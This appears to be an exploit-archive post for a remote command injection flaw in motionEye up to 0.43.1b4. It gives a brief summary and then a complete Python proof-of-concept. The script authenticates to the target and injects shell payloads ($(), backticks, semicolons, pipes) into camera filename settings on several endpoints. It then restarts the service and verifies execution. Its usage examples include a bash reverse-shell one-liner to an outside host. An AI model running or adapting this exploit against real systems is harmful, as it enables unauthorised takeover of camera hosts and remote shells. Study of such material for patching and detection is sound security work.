============================================================================================================================================= | # Title : motionEye ≤ 0.43.1b4 Remote Command Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) | | # Vendor : https://github.com/motioneye-project/ | ============================================================================================================================================= [+] Summary : A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4. The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters. Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell. Successful exploitation may allow arbitrary command execution on the host system running motionEye, potentially leading to full system compromise, data exfiltration, service disruption, or lateral movement within the network. The vulnerability stems from insufficient input handling and unsafe command construction logic when processing configuration values. [+] POC : #!/usr/bin/env python3 import requests import sys import time import re import json import logging from typing import Optional, Dict, List, Tuple, Set, Any from urllib3.exceptions import InsecureRequestWarning from requests.exceptions import RequestException, Timeout, ConnectionError requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) logging.basicConfig( level=logging.INFO, format='[%(asctime)s] %(levelname)s: %(message)s', datefmt='%H:%M:%S' ) logger = logging.getLogger(__name__) try: from bs4 import BeautifulSoup BS_AVAILABLE = True except ImportError: BS_AVAILABLE = False logger.warning("BeautifulSoup not installed. HTML parsing will be limited.") logger.warning("Install with: pip install beautifulsoup4") class MotionEyeExploitError(Exception): """Custom exception for MotionEye exploit errors.""" pass class MotionEyeExploit: SESSION_COOKIE_NAMES = {'session', 'motioneye.session', 'meye_session', 'beaker.session.id'} SUCCESS_INDICATORS = { 'success', 'saved', 'updated', 'applied', 'configuration saved' } def __init__(self, target_url: str, username: str = "admin", password: str = "", timeout: int = 30): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.default_timeout = timeout self.session = requests.Session() self.session.verify = False self.csrf_token: Optional[str] = None self.cameras: List[Dict] = [] self.authenticated = False self.session_cookie_name: Optional[str] = None self.last_command: Optional[str] = None self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', }) def _check_dependencies(self) -> bool: """Check if required dependencies are available.""" if not BS_AVAILABLE: logger.error("BeautifulSoup is required for reliable HTML parsing.") logger.error("Install it with: pip install beautifulsoup4") return False return True def _extract_csrf_token(self, html_content: str) -> Optional[str]: """ Extract CSRF token from HTML content using multiple methods. """ patterns = [ r'name=["\']csrf_token["\']\s+value=["\']([^"\']+)["\']', r'name=["\']csrf_token["\']\s+content=["\']([^"\']+)["\']', r'csrf_token[=:]\s*["\']([^"\']+)["\']', r'data-csrf-token=["\']([^"\']+)["\']', r'var\s+csrf_token\s*=\s*["\']([^"\']+)["\']', ] for pattern in patterns: match = re.search(pattern, html_content, re.IGNORECASE) if match: token = match.group(1) logger.debug(f"Found CSRF token via regex: {token[:10]}...") return token if BS_AVAILABLE: try: soup = BeautifulSoup(html_content, 'html.parser') csrf_input = soup.find('input', {'name': 'csrf_token'}) if csrf_input and csrf_input.get('value'): return csrf_input['value'] meta_tag = soup.find('meta', {'name': 'csrf_token'}) if meta_tag and meta_tag.get('content'): return meta_tag['content'] scripts = soup.find_all('script') for script in scripts: if script.string: var_match = re.search(r'csrf_token\s*=\s*["\']([^"\']+)["\']', script.string) if var_match: return var_match.group(1) except Exception as e: logger.debug(f"BeautifulSoup parsing error: {e}") logger.warning("Could not extract CSRF token") return None def _has_valid_session(self) -> bool: """ Check if the current session has a valid authentication cookie. """ if not self.session.cookies: logger.debug("No cookies found in session") return False session_cookies_found = [] for cookie_name in self.session.cookies.keys(): if cookie_name.lower() in self.SESSION_COOKIE_NAMES: session_cookies_found.append(cookie_name) self.session_cookie_name = cookie_name logger.debug(f"Found potential session cookie: {cookie_name}") if session_cookies_found: logger.debug(f"Session cookies found: {session_cookies_found}") return True logger.debug("No known session cookie names found") return False def _verify_dashboard_access(self) -> bool: """ Verify we can access the dashboard by checking for specific elements. """ try: response = self._make_request('GET', '/', timeout=10) if not response or response.status_code != 200: logger.debug("Dashboard access failed: HTTP error") return False if BS_AVAILABLE: try: soup = BeautifulSoup(response.text, 'html.parser') dashboard_indicators = [ soup.find('div', {'id': 'dashboard'}), soup.find('div', {'class': 'dashboard'}), soup.find('div', {'data-page': 'dashboard'}), soup.find('a', href=re.compile(r'/camera-\d+')), soup.find('button', string=re.compile(r'cameras?', re.I)), soup.find('span', string=re.compile(r'motioneye', re.I)), ] if any(dashboard_indicators): logger.debug("Dashboard access verified via BeautifulSoup") return True except Exception as e: logger.debug(f"BeautifulSoup dashboard verification failed: {e}") dashboard_patterns = [ r'dashboard', r'camera-\d+', r'motioneye', r'still_images', r'movies', ] for pattern in dashboard_patterns: if re.search(pattern, response.text, re.I): logger.debug(f"Dashboard access verified via regex pattern: {pattern}") return True logger.debug("No dashboard indicators found in response") return False except Exception as e: logger.debug(f"Dashboard verification error: {e}") return False def _make_request(self, method: str, endpoint: str, **kwargs) -> Optional[requests.Response]: """ Make HTTP request with proper error handling and timeout. """ url = f"{self.target_url}{endpoint}" if 'timeout' not in kwargs: kwargs['timeout'] = self.default_timeout max_retries = kwargs.pop('max_retries', 2) for attempt in range(max_retries): try: logger.debug(f"Making {method} request to {endpoint} (attempt {attempt + 1})") response = self.session.request(method, url, **kwargs) logger.debug(f"Response status: {response.status_code}") logger.debug(f"Response headers: {dict(response.headers)}") return response except Timeout as e: logger.warning(f"Request timeout to {endpoint} (attempt {attempt + 1}): {e}") except ConnectionError as e: logger.warning(f"Connection error to {endpoint}: {e} (attempt {attempt + 1})") except RequestException as e: logger.warning(f"Request failed for {endpoint}: {e} (attempt {attempt + 1})") if attempt < max_retries - 1: wait_time = 1 * (attempt + 1) logger.debug(f"Waiting {wait_time} seconds before retry...") time.sleep(wait_time) logger.error(f"All {max_retries} attempts failed for {endpoint}") return None def login(self) -> bool: """ Authenticate to motionEye and establish session. """ logger.info(f"Attempting login to {self.target_url} as {self.username}") if self._has_valid_session(): logger.debug("Found session cookies, verifying dashboard access...") if self._verify_dashboard_access(): logger.info("Already have valid session") self.authenticated = True return True else: logger.debug("Session cookies present but cannot access dashboard") response = self._make_request('GET', '/') if not response: logger.error("Failed to fetch login page") return False self.csrf_token = self._extract_csrf_token(response.text) if not self.csrf_token: logger.error("Could not extract CSRF token from login page") return False logger.debug(f"CSRF token extracted: {self.csrf_token[:10]}...") login_data = { 'username': self.username, 'password': self.password, 'csrf_token': self.csrf_token } response = self._make_request( 'POST', '/login', data=login_data, allow_redirects=False, max_retries=1 ) if not response: return False login_success = False if response.status_code == 302: location = response.headers.get('Location', '') if location == '/' or 'dashboard' in location: login_success = True logger.debug("Login success via 302 redirect") elif response.status_code == 200: if self._has_valid_session(): login_success = True logger.debug("Login success via session cookie") elif 'window.location' in response.text and ('/' in response.text or 'dashboard' in response.text): login_success = True logger.debug("Login success via JavaScript redirect") if login_success: if self._verify_dashboard_access(): logger.info("Login successful - dashboard accessible") self.authenticated = True return True else: logger.warning("Login seemed successful but dashboard not accessible") if self._has_valid_session(): self.authenticated = True return True else: logger.error(f"Login failed. Status code: {response.status_code}") return False def get_cameras(self, force_refresh: bool = False) -> bool: """ Fetch list of available cameras from the dashboard. Args: force_refresh: If True, clear existing camera list before fetching """ if force_refresh: self.cameras.clear() logger.debug("Cleared existing camera list") elif self.cameras: logger.debug(f"Using cached camera list ({len(self.cameras)} cameras)") return True logger.info("Fetching list of cameras") if not self.authenticated and not self.login(): logger.error("Not authenticated") return False response = self._make_request('GET', '/') if not response: return False cameras_found = set() if BS_AVAILABLE: try: soup = BeautifulSoup(response.text, 'html.parser') camera_links = soup.find_all('a', href=re.compile(r'^/camera-\d+')) for link in camera_links: camera_id = link.get('href').strip('/') if camera_id and camera_id not in cameras_found: camera_name = link.get_text().strip() self.cameras.append({ 'id': camera_id, 'name': camera_name or camera_id }) cameras_found.add(camera_id) camera_divs = soup.find_all('div', {'data-camera-id': True}) for div in camera_divs: camera_id = div.get('data-camera-id') if camera_id and camera_id not in cameras_found: self.cameras.append({ 'id': camera_id, 'name': div.get('data-camera-name', camera_id) }) cameras_found.add(camera_id) camera_options = soup.find_all('option', value=re.compile(r'^camera-\d+')) for option in camera_options: camera_id = option.get('value') if camera_id and camera_id not in cameras_found: self.cameras.append({ 'id': camera_id, 'name': option.get_text().strip() or camera_id }) cameras_found.add(camera_id) except Exception as e: logger.error(f"Error parsing cameras with BeautifulSoup: {e}") if not self.cameras: logger.debug("Using regex fallback for camera detection") camera_matches = re.findall(r'/camera-(\d+)', response.text) for camera_num in set(camera_matches): camera_id = f"camera-{camera_num}" self.cameras.append({ 'id': camera_id, 'name': f"Camera {camera_num}" }) if not self.cameras: logger.warning("No cameras found, using default 'camera-1'") self.cameras.append({'id': 'camera-1', 'name': 'Default Camera'}) logger.info(f"Found {len(self.cameras)} unique camera(s): {[c['id'] for c in self.cameras]}") return True def _escape_for_transport(self, command: str) -> str: """ Escape a command for safe transport in HTTP POST data. This ensures the command is properly transmitted, not escaped for shell. """ escaped = command.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'") dangerous_chars = ['`', '$', '(', ')', '|', '&', ';', '<', '>', '*', '?', '[', ']', '{', '}'] found_chars = [c for c in dangerous_chars if c in command] if found_chars: logger.info(f"Command contains shell metacharacters: {found_chars}") logger.debug("These are INTENTIONAL for command injection") return escaped def _check_response_success(self, response: requests.Response) -> Tuple[bool, str]: """ Check if a response indicates successful configuration update. Returns (success, message) """ if response.status_code not in [200, 201, 202, 204, 302]: return False, f"HTTP {response.status_code}" try: json_data = response.json() if isinstance(json_data, dict): if json_data.get('status') == 'ok': return True, "JSON status: ok" if json_data.get('success') is True: return True, "JSON success: true" if json_data.get('error'): return False, f"JSON error: {json_data['error']}" except (json.JSONDecodeError, ValueError): pass response_text = response.text.lower() error_patterns = ['error', 'fail', 'invalid', 'denied', 'forbidden'] has_error = any(pattern in response_text for pattern in error_patterns) if has_error: success_found = any(indicator.lower() in response_text for indicator in self.SUCCESS_INDICATORS) if success_found: logger.warning("Response contains both success and error indicators") return False, "Ambiguous response (both success and error)" else: return False, "Error indicators found" for indicator in self.SUCCESS_INDICATORS: if indicator.lower() in response_text: return True, f"Found indicator: {indicator}" if response.status_code == 302: location = response.headers.get('Location', '') if 'success' in location.lower() or 'saved' in location.lower(): return True, f"Redirect to: {location}" return False, "No success indicators found" def inject_payload(self, camera_id: str, command: str) -> bool: """ Inject malicious payload into camera configuration. safe_command = self._escape_for_transport(command) payload_variants = [ f"$({safe_command}).%Y-%m-%d-%H-%M-%S", f"`{safe_command}`.%Y-%m-%d-%H-%M-%S", f";{safe_command};.%Y-%m-%d-%H-%M-%S", f"|{safe_command}|.%Y-%m-%d-%H-%M-%S", ] logger.info(f"Injecting payload into camera: {camera_id}") response = self._make_request('GET', '/', timeout=10) if response: token = self._extract_csrf_token(response.text) if token: self.csrf_token = token logger.debug("Refreshed CSRF token") endpoints = [ f"/{camera_id}/config/set", "/config/set", f"/{camera_id}/edit", "/config/update", "/settings/camera", ] for endpoint in endpoints: for idx, payload in enumerate(payload_variants): logger.debug(f"Trying endpoint: {endpoint} with payload variant {idx + 1}") data = { 'still_images_image_file_name': payload, 'movie_file_name': payload, 'timelapse_file_name': payload, } if self.csrf_token: data['csrf_token'] = self.csrf_token headers = {} if self.csrf_token: headers['X-CSRFToken'] = self.csrf_token response = self._make_request('POST', endpoint, data=data, headers=headers) if not response: continue success, message = self._check_response_success(response) if success: logger.info(f"Payload injected successfully via {endpoint}") logger.debug(f"Success message: {message}") return True logger.debug(f"Endpoint {endpoint} returned: {message}") logger.error(f"Failed to inject payload through any endpoint for camera {camera_id}") return False def restart_motion(self) -> bool: """ Attempt to restart motion service through various endpoints. """ logger.info("Attempting to restart motion service") if not self.authenticated and not self.login(): logger.error("Not authenticated") return False restart_endpoints = [ ('/action/restart', 'POST', {}), ('/action/restart_motion', 'POST', {}), ('/action/restart_all', 'POST', {}), ('/config/restart', 'POST', {}), ('/restart', 'GET', {}), ('/api/restart', 'POST', {'Content-Type': 'application/json'}), ] for endpoint, method, headers in restart_endpoints: logger.debug(f"Trying {method} {endpoint}") data = {} if self.csrf_token and method == 'POST': data['csrf_token'] = self.csrf_token try: if method == 'POST': response = self._make_request('POST', endpoint, data=data, headers=headers) else: response = self._make_request('GET', endpoint, headers=headers) if response: if response.status_code in [200, 202, 204, 302]: logger.info(f"Restart triggered via {endpoint}") return True else: logger.debug(f"Endpoint {endpoint} returned {response.status_code}") except Exception as e: logger.debug(f"Error with {endpoint}: {e}") continue logger.warning("Could not trigger restart automatically") return False def verify_exploit(self, expected_file: str = "/tmp/pwned_verified") -> bool: """ Verify if the exploit was successful by checking for expected evidence. Returns True if verification succeeded, False if failed or inconclusive. """ logger.info("Verifying exploit success...") if self.last_command and 'touch' in self.last_command: touch_match = re.search(r'touch\s+([^\s;|&]+)', self.last_command) if touch_match: expected_file = touch_match.group(1) logger.info(f"Looking for created file: {expected_file}") filename = expected_file.split('/')[-1] if '/' in expected_file else expected_file web_paths = [ f"/motion/{filename}", f"/static/{filename}", f"/media/{filename}", f"/{filename}", ] for web_path in web_paths: response = self._make_request('GET', web_path, timeout=10) if response and response.status_code == 200: logger.info(f"Found expected file at {web_path}") return True logger.info("=" * 60) logger.info("MANUAL VERIFICATION REQUIRED:") logger.info(f"Target: {self.target_url}") logger.info(f"Command executed: {self.last_command or 'unknown'}") logger.info(f"Expected evidence: {expected_file}") logger.info("\nTo verify on Docker:") logger.info(f" docker exec motioneye ls -la {expected_file}") logger.info("\nTo verify on system:") logger.info(f" ls -la {expected_file}") logger.info("\nTo verify via web (if accessible):") logger.info(f" curl -k {self.target_url}/motion/") logger.info("=" * 60) return False def run(self, command: str) -> Dict[str, bool]: """ Execute the full exploit chain. Returns dictionary with status of each step. """ results = { 'login': False, 'cameras': False, 'injection': False, 'restart': False, 'verification': False, 'overall': False } self.last_command = command logger.info("=" * 60) logger.info("Starting motionEye RCE exploit") logger.info(f"Target: {self.target_url}") logger.info(f"Command: {command}") logger.info("=" * 60) if not self._check_dependencies(): logger.error("Dependencies check failed") return results if not self.login(): logger.error("Login failed. Exiting.") return results results['login'] = True if not self.get_cameras(): logger.error("Failed to get camera list") return results results['cameras'] = True injection_success = False for camera in self.cameras: if self.inject_payload(camera['id'], command): injection_success = True break if not injection_success: logger.error("Failed to inject payload into any camera") results['injection'] = False return results results['injection'] = True if self.restart_motion(): results['restart'] = True wait_time = 10 logger.info(f"Waiting {wait_time} seconds for command execution...") time.sleep(wait_time) results['verification'] = self.verify_exploit() results['overall'] = injection_success logger.info("=" * 60) logger.info("Exploit execution completed") logger.info(f"Results: {results}") logger.info("=" * 60) return results def main(): """ Main function with argument parsing. """ import argparse parser = argparse.ArgumentParser( description="MotionEye <= 0.43.1b4 RCE Exploit (CVE-2025-60787)", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: %(prog)s -t http://192.168.1.100:8765 -c "touch /tmp/pwned" %(prog)s -t https://motioneye.local -c "id > /tmp/output" -v %(prog)s -t http://localhost:9999 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --dangerous """ ) parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., http://127.0.0.1:8765)') parser.add_argument('-u', '--username', default='admin', help='Username (default: admin)') parser.add_argument('-p', '--password', default='', help='Password (default: empty)') parser.add_argument('-c', '--command', default='touch /tmp/pwned_by_exploit', help='Command to execute (default: touch /tmp/pwned_by_exploit)') parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose output') parser.add_argument('--dangerous', action='store_true', help='Acknowledge that the command may be dangerous') parser.add_argument('--camera', help='Specific camera ID to target (default: auto-detect)') parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds (default: 30)') args = parser.parse_args() if args.verbose: logger.setLevel(logging.DEBUG) dangerous_patterns = ['bash -i', 'nc ', 'reverse', 'shell', 'exec', '/dev/tcp/'] if any(pattern in args.command.lower() for pattern in dangerous_patterns) and not args.dangerous: logger.warning(" Command appears to be potentially dangerous!") logger.warning("Use --dangerous flag to proceed with this command") sys.exit(1) exploit = MotionEyeExploit( target_url=args.target, username=args.username, password=args.password, timeout=args.timeout ) try: results = exploit.run(args.command) if results['overall']: if results['verification']: logger.info(" Exploit fully successful - command execution verified") sys.exit(0) else: logger.info(" Exploit likely successful - manual verification required") sys.exit(2) else: logger.error(" Exploit failed") sys.exit(1) except KeyboardInterrupt: logger.info("\nExploit interrupted by user") sys.exit(130) except Exception as e: logger.error(f"Unexpected error: {e}") if args.verbose: import traceback traceback.print_exc() sys.exit(1) if __name__ == "__main__": main() Greetings to :====================================================================== jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)| ====================================================================================